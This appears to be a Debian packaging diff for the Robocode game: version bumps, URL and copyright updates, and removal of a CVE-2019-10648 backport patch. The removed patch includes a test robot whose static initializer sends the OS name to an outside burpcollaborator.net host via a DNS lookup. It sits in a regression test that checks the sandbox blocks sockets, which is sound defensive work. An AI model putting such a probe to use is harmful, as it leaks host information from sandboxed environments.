Markus Koschany · Markus Koschany · Markus Koschany · Markus Koschany · Markus Koschany · Markus Koschany
--- a/.gitignore
+++ b/.gitignore
@@ -10,3 +10,4 @@ ucdetector_reports
 *.class
 .recommenders
 .sonarlint
+RemoteSystemsTempFiles
--- a/LICENSE.txt
+++ b/LICENSE.txt
 Robocode is licensed under the Eclipse Public License v1.0 (EPL), which is available at
-http://robocode.sourceforge.net/license/epl-v10.html
+https://robocode.sourceforge.io/license/epl-v10.html

 Notable exceptions are:
 -----------------------

--- a/README.md
+++ b/README.md
@@ -3,8 +3,8 @@

 Robocode is a programming game, where the goal is to develop a robot battle tank to battle against other tanks in Java or .NET. The robot battles are running in real-time and on-screen.
  
-Read [Introduction](http://robocode.sourceforge.net/docs/ReadMe.html)  
-Continue reading on [Robocode home page](http://robocode.sourceforge.net/)  
+Read [Introduction](https://robocode.sourceforge.io/docs/ReadMe.html)  
+Continue reading on [Robocode home page](https://robocode.sourceforge.io/)  
 Learn from community at [RoboWiki](http://robowiki.net/)  
 Talk to developers at [robocode-developers](http://groups.google.com/group/robocode-developers)  


--- a/debian/changelog
+++ b/debian/changelog
+robocode (1.9.3.5-1) unstable; urgency=medium
+
+  * New upstream version 1.9.3.5.
+  * Repack the tarball and remove the Maven files.
+  * Drop CVE-2019-10648.patch. Fixed upstream.
+  * Use debhelper-compat = 12.
+  * Declare compliance with Debian Policy 4.4.0.
+  * Use canonical VCS-URI.
+  * Tighten dependency to java8-runtime.
+  * Remove robocode.doc-base file.
+
+ -- Markus Koschany <apo@debian.org>  Wed, 17 Jul 2019 22:35:34 +0200
+
 robocode (1.9.3.3-3) unstable; urgency=medium

  * Use javahelper and add missing library classes to the classpath to fix

--- a/debian/compat
+++ b/debian/compat
-11
--- a/debian/control
+++ b/debian/control
@@ -5,7 +5,7 @@ Maintainer: Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.or
 Uploaders:
 Markus Koschany <apo@debian.org>
 Build-Depends:
- debhelper (>= 11),
+ debhelper-compat (= 12),
 default-jdk,
 default-jdk-doc,
 javahelper,
@@ -19,15 +19,15 @@ Build-Depends:
 libpicocontainer-java,
 libpicocontainer-java-doc,
 maven-debian-helper
-Standards-Version: 4.2.1
+Standards-Version: 4.4.0
 Homepage: http://robocode.sourceforge.net/
-Vcs-Git: https://anonscm.debian.org/git/pkg-java/robocode.git
-Vcs-Browser: https://anonscm.debian.org/cgit/pkg-java/robocode.git
+Vcs-Git: https://salsa.debian.org/java-team/robocode.git
+Vcs-Browser: https://salsa.debian.org/java-team/robocode

 Package: robocode
 Architecture: all
 Depends:
- default-jre | java7-runtime,
+ default-jre | java8-runtime,
 ${maven:Depends},
 ${misc:Depends}
 Recommends:

--- a/debian/copyright
+++ b/debian/copyright
@@ -2,9 +2,12 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Upstream-Name: Robocode
 Upstream-Contact: fnl@users.sourceforge.net
 Source: https://github.com/robo-code/robocode
+Files-Excluded:
+ .mvn
+ mvn*

 Files: *
-Copyright: 2001-2018, Mathew A. Nelson and Robocode contributors
+Copyright: 2001-2019, Mathew A. Nelson and Robocode contributors
 License: EPL-1.0
 Comments:
 Please see also the "About"-menu for a complete list of contributors.
@@ -39,7 +42,7 @@ License: Expat

 Files: debian/*
 Copyright: 2007-2010, Chris Lamb <chris@chris-lamb.co.uk>
-           2014-2018, Markus Koschany <apo@debian.org>
+           2014-2019, Markus Koschany <apo@debian.org>
 License: EPL-1.0

 License: EPL-1.0

--- a/debian/patches/CVE-2019-10648.patch
+++ b/debian/patches/CVE-2019-10648.patch
-From: Markus Koschany <apo@debian.org>
-Date: Mon, 8 Apr 2019 00:11:33 +0200
-Subject: CVE-2019-10648
-
-Bug-Debian: https://bugs.debian.org/926088
-Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
---
- .../host/security/RobocodeSecurityManager.java     | 26 ++++++++++--
- .../src/main/java/tested/robots/DnsAttack.java     | 18 +++++++++
- .../test/robots/TestConstructorHttpAttack.java     | 11 +++---
- .../sf/robocode/test/robots/TestHttpAttack.java    | 11 +++---
- .../robots/TestStaticConstructorDnsAttack.java     | 46 ++++++++++++++++++++++
- 5 files changed, 96 insertions(+), 16 deletions(-)
- create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
- create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
-
-diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
-index bc4c85a..ebd23e9 100644
--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
-+++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
-@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
- import net.sf.robocode.host.IThreadManager;
- import net.sf.robocode.io.RobocodeProperties;
- 
-+import java.net.SocketPermission;
- import java.security.AccessControlException;
-+import java.security.Permission;
- 
- 
- /**
-@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager {
- 		}
- 
- 		Thread c = Thread.currentThread();
-
- 		if (isSafeThread(c)) {
- 			return;
- 		}
-@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager {
- 			if (robotProxy != null) {
- 				robotProxy.punishSecurityViolation(message);
- 			}
-			throw new AccessControlException(message);
-+			throw new SecurityException(message);
- 		}
- 	}
- 
-@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager {
- 			return;
- 		}
- 		Thread c = Thread.currentThread();
-
- 		if (isSafeThread(c)) {
- 			return;
- 		}
-@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager {
- 			String message = "Robots are only allowed to create up to 5 threads!";
- 
- 			robotProxy.punishSecurityViolation(message);
-			throw new AccessControlException(message);
-+			throw new SecurityException(message);
- 		}
- 	}
-+	
-+    public void checkPermission(Permission perm) {
-+		if (RobocodeProperties.isSecurityOff()) {
-+			return;
-+		}
-+		Thread c = Thread.currentThread();
-+		if (isSafeThread(c)) {
-+			return;
-+		}
-+        super.checkPermission(perm);
-+
-+        if (perm instanceof SocketPermission) {
-+    		IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
-+        	String message = "Using socket is not allowed";
-+        	robotProxy.punishSecurityViolation(message);
-+            throw new SecurityException(message);
-+        }
-+    }
- 
- 	private boolean isSafeThread(Thread c) {
- 		return threadManager.isSafeThread(c);
-diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
-new file mode 100644
-index 0000000..701e5d8
--- /dev/null
-+++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
-@@ -0,0 +1,18 @@
-+package tested.robots;
-+
-+public class DnsAttack extends robocode.Robot {
-+	static {
-+		try {
-+			new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
-+					+ ".randomsubdomain.burpcollaborator.net").openStream();
-+		} catch (Exception e) {
-+		}
-+	}
-+
-+	public void run() {
-+		for (;;) {
-+			ahead(100);
-+			back(100);
-+		}
-+	}
-+}
-diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
-index 8d7b1d7..7930237 100755
--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
-+++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
-@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
- public class TestConstructorHttpAttack extends RobocodeTestBed {
- 
- 	private boolean messagedInitialization;
-	private boolean messagedAccessDenied;
-+	private boolean securityExceptionOccurred;
- 	
- 	@Override
- 	public String getRobotNames() {
-@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed {
- 			messagedInitialization = true;	
- 		}	
- 
-		if (out.contains("access denied (java.net.SocketPermission")
-				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
-			messagedAccessDenied = true;	
-+		if (out.contains("java.lang.SecurityException:")) {
-+			securityExceptionOccurred = true;	
- 		}	
- 	}
- 
- 	@Override
- 	protected void runTeardown() {
- 		Assert.assertTrue("Error during initialization", messagedInitialization);
-		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
-+		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
- 	}
- 
- 	@Override
- 	protected int getExpectedErrors() {
-		return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
-+		return 2;
- 	}
- }
-diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
-index 770fb49..06d3bcb 100755
--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
-+++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
-@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
-  */
- public class TestHttpAttack extends RobocodeTestBed {
- 
-	private boolean messagedAccessDenied;
-+	private boolean securityExceptionOccurred;
- 	
- 	@Override
- 	public String getRobotNames() {
-@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
- 
- 		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
- 
-		if (out.contains("access denied (java.net.SocketPermission")
-				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
-			messagedAccessDenied = true;	
-+		if (out.contains("java.lang.SecurityException:")) {
-+			securityExceptionOccurred = true;	
- 		}	
- 	}
- 
- 	@Override
- 	protected void runTeardown() {
-		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
-+		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
- 	}
- 
- 	@Override
- 	protected int getExpectedErrors() {
-		return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
-+		return 1;
- 	}
- }
-diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
-new file mode 100644
-index 0000000..bf62373
--- /dev/null
-+++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
-@@ -0,0 +1,46 @@
-+/**
-+ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
-+ * All rights reserved. This program and the accompanying materials
-+ * are made available under the terms of the Eclipse Public License v1.0
-+ * which accompanies this distribution, and is available at
-+ * https://robocode.sourceforge.io/license/epl-v10.html
-+ */
-+package net.sf.robocode.test.robots;
-+
-+import net.sf.robocode.test.helpers.RobocodeTestBed;
-+import org.junit.Assert;
-+import robocode.control.events.TurnEndedEvent;
-+
-+/**
-+ * @author Flemming N. Larsen (original)
-+ */
-+public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
-+
-+	private boolean securityExceptionOccurred;
-+	
-+	@Override
-+	public String getRobotNames() {
-+		return "tested.robots.DnsAttack,sample.Target";
-+	}
-+
-+	@Override
-+	public void onTurnEnded(TurnEndedEvent event) {
-+		super.onTurnEnded(event);
-+
-+		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
-+
-+		if (out.contains("SYSTEM: Using socket is not allowed")) {
-+			securityExceptionOccurred = true;	
-+		}	
-+	}
-+
-+	@Override
-+	protected void runTeardown() {
-+		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
-+	}
-+
-+	@Override
-+	protected int getExpectedErrors() {
-+		return 1;
-+	}
-+}
--- a/debian/patches/series
+++ b/debian/patches/series
 showJavaDocumentation.patch
 maven-assembly.patch
 ecj.patch
-CVE-2019-10648.patch
--- a/debian/robocode.doc-base
+++ b/debian/robocode.doc-base
-Document: robocode
-Title: API Javadoc for Robocode
-Author: Robocode developers
-Abstract: This is the API Javadoc provided for Robocode.
-Section: Programming
-
-Format: HTML
-Index: /usr/share/games/robocode/javadoc/index.html
-Files: /usr/share/games/robocode/javadoc/*
--- a/debian/robocode.manifest
+++ b/debian/robocode.manifest
 usr/share/java/robocode.jar:
- Class-Path: /usr/share/java/codesize.jar /usr/share/java/picocontainer.jar /usr/share/java/robocode.battle-1.9.3.3.jar /usr/share/java/robocode.core-1.9.3.3.jar /usr/share/java/robocode.host-1.9.3.3.jar /usr/share/java/robocode.repository-1.9.3.3.jar /usr/share/java/robocode.sound-1.9.3.3.jar /usr/share/java/robocode.ui-1.9.3.3.jar /usr/share/java/robocode.ui.editor-1.9.3.3.jar /usr/share/java/roborumble.jar
+ Class-Path: /usr/share/java/codesize.jar /usr/share/java/picocontainer.jar /usr/share/java/robocode.battle-1.9.3.5.jar /usr/share/java/robocode.core-1.9.3.5.jar /usr/share/java/robocode.host-1.9.3.5.jar /usr/share/java/robocode.repository-1.9.3.5.jar /usr/share/java/robocode.sound-1.9.3.5.jar /usr/share/java/robocode.ui-1.9.3.5.jar /usr/share/java/robocode.ui.editor-1.9.3.5.jar /usr/share/java/roborumble.jar
 Main-Class: robocode.Robocode
--- a/debian/rules
+++ b/debian/rules
@@ -18,4 +18,3 @@ override_dh_installchangelogs:
 override_dh_install:
 	$(RM) -r debian/robocode/usr/share/maven-repo
 	dh_install
-
--- a/jacobe.cmd
+++ b/jacobe.cmd
 @REM
-@REM Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
+@REM Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
 @REM All rights reserved. This program and the accompanying materials
 @REM are made available under the terms of the Eclipse Public License v1.0
 @REM which accompanies this distribution, and is available at
-@REM http://robocode.sourceforge.net/license/epl-v10.html
+@REM https://robocode.sourceforge.io/license/epl-v10.html
 @REM



--- a/jacobe.sh
+++ b/jacobe.sh
 #!/bin/bash
 #
-# Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
+# Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
 # All rights reserved. This program and the accompanying materials
 # are made available under the terms of the Eclipse Public License v1.0
 # which accompanies this distribution, and is available at
-# http://robocode.sourceforge.net/license/epl-v10.html
+# https://robocode.sourceforge.io/license/epl-v10.html
 #

 # NOTE: Here we expect the jacobe tools to be installed on PATH

--- a/mvn.cmd
+++ b/mvn.cmd
-@REM
-@REM Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
-@REM All rights reserved. This program and the accompanying materials
-@REM are made available under the terms of the Eclipse Public License v1.0
-@REM which accompanies this distribution, and is available at
-@REM http://robocode.sourceforge.net/license/epl-v10.html
-@REM
-
-@echo off
-
-if not exist "%~dp0\tools\lib\maven-*-uber.jar" (
-   call "%~dp0\tools\loadTools.cmd"
-)
-
-call "%~dp0\tools\bin\mvn.bat" %*
\ No newline at end of file
--- a/mvn.sh
+++ b/mvn.sh
-#!/bin/bash
-#
-# Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
-# All rights reserved. This program and the accompanying materials
-# are made available under the terms of the Eclipse Public License v1.0
-# which accompanies this distribution, and is available at
-# http://robocode.sourceforge.net/license/epl-v10.html
-#
-
-dp0=${0%/*}
-
-if [ ! -f $dp0/tools/lib/maven-*-uber.jar ]; then
-   $dp0/tools/loadTools.sh
-fi
-
-$dp0/tools/bin/mvn.sh $*
\ No newline at end of file
--- a/mvnassembly.cmd
+++ b/mvnassembly.cmd
-@REM
-@REM Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
-@REM All rights reserved. This program and the accompanying materials
-@REM are made available under the terms of the Eclipse Public License v1.0
-@REM which accompanies this distribution, and is available at
-@REM http://robocode.sourceforge.net/license/epl-v10.html
-@REM
-
-@echo off
-
-mvn clean install ant:ant -DskipTests=false %*
-rem mvn eclipse:eclipse
\ No newline at end of file
--- a/mvnassembly.sh
+++ b/mvnassembly.sh
-#!/bin/bash
-#
-# Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
-# All rights reserved. This program and the accompanying materials
-# are made available under the terms of the Eclipse Public License v1.0
-# which accompanies this distribution, and is available at
-# http://robocode.sourceforge.net/license/epl-v10.html
-#
-
-./mvn.sh clean install ant:ant -DskipTests=false $*
-#./mvn.sh eclipse:eclipse
\ No newline at end of file
--- a/plugins/dotnet/ReadMe.txt
+++ b/plugins/dotnet/ReadMe.txt
 ====
-    Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
+    Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
    All rights reserved. This program and the accompanying materials
    are made available under the terms of the Eclipse Public License v1.0
    which accompanies this distribution, and is available at
-    http://robocode.sourceforge.net/license/epl-v10.html
+    https://robocode.sourceforge.io/license/epl-v10.html
 ====

 This is guide to build Robocode for .NET

--- a/plugins/dotnet/generateProxies.cmd
+++ b/plugins/dotnet/generateProxies.cmd
 @REM
-@REM Copyright (c) 2001-2018 Mathew A. Nelson and Robocode contributors
+@REM Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
 @REM All rights reserved. This program and the accompanying materials
 @REM are made available under the terms of the Eclipse Public License v1.0
 @REM which accompanies this distribution, and is available at
-@REM http://robocode.sourceforge.net/license/epl-v10.html
+@REM https://robocode.sourceforge.io/license/epl-v10.html
 @REM

 @echo off